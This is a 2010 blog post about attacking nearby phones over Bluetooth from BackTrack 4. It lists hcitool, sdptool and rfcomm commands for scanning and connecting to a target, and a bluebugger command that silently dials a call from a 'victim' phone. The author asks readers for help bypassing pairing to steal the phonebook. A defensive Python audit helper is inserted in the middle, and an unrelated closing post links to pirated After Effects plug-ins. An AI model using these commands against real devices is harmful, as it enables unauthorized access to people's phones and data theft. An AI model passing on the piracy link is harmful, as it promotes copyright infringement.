Tuesday, February 16, 2010

What do you know about Bluetooth hacking on BT4 (Presentation)

Bluetooth hacking on BT4

To be clear, this is not a tutorial on hacking Bluetooth. I am just looking for ideas from other people who have a deeper understanding of Bluetooth. You can visit the sites below for basic training:-
http://www.youtube.com/watch?v=PvxccqVC4Oo
http://www.youtube.com/watch?v=6z1d3sXD9RU

You can also join the Facebook Hacking Bluetooth page for more ideas:-
http://www.facebook.com/pages/Hacking-Bluetooth/273923608586?ref=ts

What do I have on my box
First, I wrote a script to configure my Bluetooth device so that I wouldn't have to keep typing every time I need to set it up. This is what it looks like:

#!/bin/sh
# Create the rfcomm device nodes by hand (BT4 did not create them for you).
# A directory needs the execute bit to be entered, so 755 rather than 666 here.
mkdir -p -m 755 /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
mknod -m 666 /dev/bluetooth/rfcomm0 c 216 0

# Firing up the bluetooth device

hciconfig hci0 up
hciconfig hci0 class 0x500204               # Class of Device: phone/cellular, telephony + object transfer
hciconfig hci0 lm accept,master             # link mode: accept incoming connections, prefer master role
hciconfig hci0 lp rswitch,hold,sniff,park   # link policy: allow role switch and the low-power modes
hciconfig hci0 auth enable                  # require authentication (pairing) for connections
hciconfig hci0 encrypt enable               # require link-level encryption
hciconfig hci0 name ronsoft                 # friendly name shown to other devices

If you would rather change these settings through the config files, go to the Bluetooth directory /etc/bluetooth/ and open the files there with nano.
Here you have control of even more options by playing around with the conf files:
> rfcomm.conf
> network.conf
> main.conf
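As an added example (not part of the original post), here is a short Python helper that decodes the Class of Device value used in the script above (0x500204) and reads the flag line of hciconfig -a output to show what the adapter is really advertising: whether it is discoverable (ISCAN) and whether auth and encrypt actually took effect. The hciconfig output embedded below is constructed, not a real capture.

```python
import re

# Class of Device bit layout (Bluetooth Assigned Numbers, Baseband):
# bits 13-23 major service classes, 8-12 major device class, 2-7 minor class.
SERVICE_BITS = {13: "Limited Discoverable", 16: "Positioning", 17: "Networking",
                18: "Rendering", 19: "Capturing", 20: "Object Transfer",
                21: "Audio", 22: "Telephony", 23: "Information"}
MAJOR = {0: "Miscellaneous", 1: "Computer", 2: "Phone", 3: "LAN/Network AP",
         4: "Audio/Video", 5: "Peripheral", 6: "Imaging", 7: "Wearable",
         8: "Toy", 9: "Health", 31: "Uncategorized"}
PHONE_MINOR = {0: "Uncategorized", 1: "Cellular", 2: "Cordless", 3: "Smartphone",
               4: "Wired modem/voice gateway", 5: "Common ISDN access"}

# Constructed 'hciconfig -a' output mirroring the script above (not a real capture).
SAMPLE = """\
hci0:   Type: USB
        BD Address: 00:11:22:33:44:55  ACL MTU: 310:10  SCO MTU: 64:8
        UP RUNNING PSCAN ISCAN AUTH ENCRYPT
        Link mode: MASTER ACCEPT
        Name: 'ronsoft'
        Class: 0x500204
"""


def decode_cod(cod):
    """Split a 24-bit Class of Device (e.g. 0x500204) into its three fields."""
    services = [n for b, n in sorted(SERVICE_BITS.items()) if cod & (1 << b)]
    major = (cod >> 8) & 0x1F
    minor = (cod >> 2) & 0x3F
    minor_name = PHONE_MINOR.get(minor) if major == 2 else None
    return {"services": services, "major": MAJOR.get(major, "reserved"),
            "minor": minor_name or "0x%02x" % minor}


def audit_hciconfig(text):
    """Report discoverability and link-security flags from 'hciconfig -a' output."""
    flags = set()
    for line in text.splitlines():
        toks = line.split()
        if toks and toks[0] in ("UP", "DOWN"):  # hciconfig's flag line starts with UP/DOWN
            flags.update(toks)
    m = re.search(r"Class:\s*(0x[0-9a-fA-F]+)", text)
    findings = []
    if "ISCAN" in flags:
        findings.append("discoverable (ISCAN): any nearby device can find this adapter")
    if "PSCAN" in flags and "AUTH" not in flags:
        findings.append("connectable without authentication (AUTH off)")
    if "AUTH" in flags and "ENCRYPT" not in flags:
        findings.append("authentication on but link encryption not required (ENCRYPT off)")
    cod = decode_cod(int(m.group(1), 16)) if m else None
    return {"flags": sorted(flags), "class": cod, "findings": findings}
```

Run audit_hciconfig(SAMPLE) to see the page's configuration summarised; feed it real hciconfig -a output to check that auth and encrypt are actually set on your own adapter.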

Footprinting the remote device
Scan for devices:

hcitool -i hci0 scan
hcitool info xx:xx:xx:xx:xx:xx

You can also ping the device to see whether it is in range:
l2ping xx:xx:xx:xx:xx:xx

sdptool browse --l2cap xx:xx:xx:xx:xx:xx

This will list all services, channels and a lot of info about the remote device. You may wonder how this could help, but this is the gold mine of Bluetooth hacking. Take a pen and paper and note down the important services with their channel numbers, record handles and attribute values. Well-known services:-
DUN - Dial-up Networking
OBEX - Object Exchange
OPUSH - Object Push for file transfer
SAP - SIM Access

Update your SDP database

sdptool add --handle=<handle> --channel=<channel> <service>
sdptool add --handle=0x10013 --channel=4 SAP
Now the stress starts from here: trying to bind and then connect the rfcomm device to the remote device.

rfcomm

rfcomm bind /dev/bluetooth/rfcomm xx:xx:xx:xx:xx:xx 4
rfcomm connect /dev/bluetooth/rfcomm xx:xx:xx:xx:xx:xx 4
rfcomm show

With the above code, my box turns into an error box. First I get the signals to the remote Bluetooth phone, but nothing can happen until I accept the request from the phone. Well, the victim may by chance just hit the accept button without knowing..hahahahaaa....! After establishing the connection, the remote device needs a 16 digit number in order to complete the pairing!

Now guys, take your turn and tell me: how do you deal with this in your own world?

I tried bluesnarfer and bluebugger but still couldn't get very far. The funny thing is that I can make a call through to the remote device but I can't pull its phonebook!

bluebugger -m Ron -c 7 -a xx:xx:xx:xx:xx:xx dial 9818303531
The call goes through successfully without any accept prompt on the phone; only the screen light blinks.

These are some of the errors I get when I try it with bluesnarfer and more of bluebugger.

bt_rfcomm_config failed
unable to create rfcomm connect
open /dev/bluetooth/rfcomm/0 connection refused

Can't connect RFCOMM socket:
tcget attr failed: Input / output error
bt_rfcomm_config() failed

rfcomm error connection 216 connection fail
RFCOMMDEV / bluetooth/ not connected.

Guys, if you are good enough with Bluetooth, please help out. No one has yet attempted to find a solution to this question, I assume, because there are a lot of questions but few answers.

Reference:
http://www.palowireless.com/infotooth/tutorial/rfcomm.asp

Downloading and Installing Trapcode Plug-ins (Video)

Wondering where to download Trapcode plug-ins 100% for free? How to install them so that they are ready to use in After Effects? Then this video is dedicated to you.

Download Link:
http://thepiratebay.org/search/trapco...
